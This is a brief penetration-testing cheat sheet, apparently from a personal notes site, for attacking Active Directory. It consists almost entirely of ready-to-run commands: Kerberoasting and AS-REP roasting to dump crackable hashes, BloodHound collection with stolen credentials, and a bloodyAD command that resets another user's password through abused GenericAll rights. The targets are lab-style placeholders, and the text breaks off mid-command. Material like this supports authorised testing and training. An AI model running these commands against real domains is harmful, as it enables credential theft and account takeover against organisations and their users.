Kerberoasting #Get TGS Ticket Using GetUserSPNs.py sudo GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark Find Pre-Auth Disabled Users GetNPUsers.py DOMAIN/ -usersfile user.txt -outputfile hash.txt -dc-ip 10.10.10.10 Running Bloodhound on Linux #Match the Time with Doamin controller. sudo apt-get install ntpdate sudo ntpdate <DC IP> #Add required DNS to /etc/hosts if there is no direct DNS #Once you have creds for any user -run blood hound to look for priv esc git clone https://github.com/dirkjanm/BloodHound.py pip install bloodhound-python -u UserName -p "P@SSW)RD!" -d steins.local -ns 10.10.10.10 -c All Abusing GenericAll or ForceChangePassword or Password Reset git clone https://github.com/CravateRouge/bloodyAD #User1 has GenericAll Permisions on User2 #Change password for User2 python bloodyAD.py -u "User1" -p "Password1" -d "domain.local" --host "10.10.10.4" set password "User2" "123456...
Way to Divergence